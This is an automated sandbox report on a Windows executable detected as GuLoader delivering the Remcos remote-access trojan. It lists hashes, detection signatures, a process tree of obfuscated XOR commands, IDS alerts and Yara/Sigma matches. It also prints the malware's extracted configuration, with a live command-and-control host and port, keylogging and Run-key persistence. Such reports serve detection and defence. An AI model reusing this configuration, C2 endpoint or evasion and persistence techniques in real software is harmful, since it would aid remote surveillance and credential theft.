
Windows Analysis Report
asXlZG3aW6.exe

Overview

General Information

Sample name: asXlZG3aW6.exe
Analysis ID: 1529110
MD5: 51bfab682069e4e7a2ba7b8379d3927b
SHA1: 852ac154d253e128199c7cf766d74ac8a6e9d146
SHA256: 0ffb9d8b5cc25cd280763fe84065f5f149b17eb5d9e19dd59ba6c324d292572b
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Submitted sample is a known malware sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Maps a DLL or memory area into another process
Mass process execution to delay analysis
Obfuscated command line found
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • asXlZG3aW6.exe (PID: 3616 cmdline: "C:\Users\user\Desktop\asXlZG3aW6.exe" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
    • cmd.exe (PID: 5748 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1528 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5312 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5692 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6692 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6208 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7736 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6268 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7020 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2380 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5416 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1532 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4924 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2624 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6956 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7496 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4472 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 560 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 308 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7220 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4184 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2996 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 916 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1112 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4832 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6380 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5748 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6148 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2836 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6692 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3096 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1528 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1500 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5796 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1108 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3372 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2660 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5312 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5796 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7568 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6824 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5300 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3200 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1532 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6232 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 428 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5424 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2676 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5300 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2220 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1608 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6692 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4436 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7736 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 616 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7496 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5312 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 560 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7568 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2868 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2056 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6148 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6080 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 308 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • asXlZG3aW6.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\asXlZG3aW6.exe" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
      • asXlZG3aW6.exe (PID: 6596 cmdline: C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
      • asXlZG3aW6.exe (PID: 5676 cmdline: C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
      • asXlZG3aW6.exe (PID: 8124 cmdline: C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx" MD5: 51BFAB682069E4E7A2BA7B8379D3927B)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "newfarmn.pro:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-13IBN7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

System Summary

Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Lunendes
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Lunendes
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetFilename: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetFilename: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr

Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\asXlZG3aW6.exe, ProcessId: 4464, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T16:52:33.225373+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49736 | 41.216.188.178 | 2404 | TCP
2024-10-08T16:52:34.443607+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49737 | 41.216.188.178 | 2404 | TCP
2024-10-08T16:52:34.459283+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49738 | 41.216.188.178 | 2404 | TCP
2024-10-08T16:52:34.506109+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49739 | 41.216.188.178 | 2404 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T16:52:34.468675+0200 | 2803304 | 3 | Unknown Traffic | 192.168.11.20 | 49740 | 178.237.33.50 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T16:52:24.650841+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49735 | 102.65.21.26 | 443 | TCP

AV Detection

Source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": "newfarmn.pro:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-13IBN7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr; ReversingLabs: Detection: 55%
Source: asXlZG3aW6.exe; ReversingLabs: Detection: 55%
Source: Yara match; File source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
